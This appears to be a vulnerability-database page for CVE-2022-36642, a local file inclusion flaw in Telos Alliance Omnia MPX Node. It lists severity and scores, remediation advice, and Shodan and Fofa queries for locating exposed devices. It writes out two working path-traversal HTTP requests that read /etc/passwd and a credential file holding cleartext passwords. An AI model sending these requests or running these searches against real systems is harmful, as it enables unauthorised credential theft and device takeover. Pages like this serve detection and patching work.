🔙 목록으로 돌아가기

CVE-2022-36642: Omnia MPX 1.5.0+r1 - Local File Inclusion

TitleOmnia MPX 1.5.0+r1 - Local File Inclusion
Authorarafatansari,ritikchaddha,For3stCo1d
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, potentially leading to further compromise of the system.
RemediationApply the latest security patch or upgrade to a non-vulnerable version of Omnia MPX.
CVSS Score9.8
EPSS Score0.71462
CVE IDCVE-2022-36642
CWE IDCWE-862
Shodan Queryhttp.title:"Omnia MPX Node | Login"http.title:"omnia mpx node | login"
Fofa Querytitle="omnia mpx node | login"
Tags cve cve2022 traversal omnia edb lfi telosalliance vkev vuln

🔍 Vulnerability Description

Telos Alliance Omnia MPX Node through 1.5.0+r1 is vulnerable to local file inclusion via logs/downloadMainLog. By retrieving userDB.json allows an attacker to retrieve cleartext credentials and escalate privileges via the control panel.

🌐 HTTP Request

GET /logs/downloadMainLog?fname=../../../../../../..//etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-36642.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-36642.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A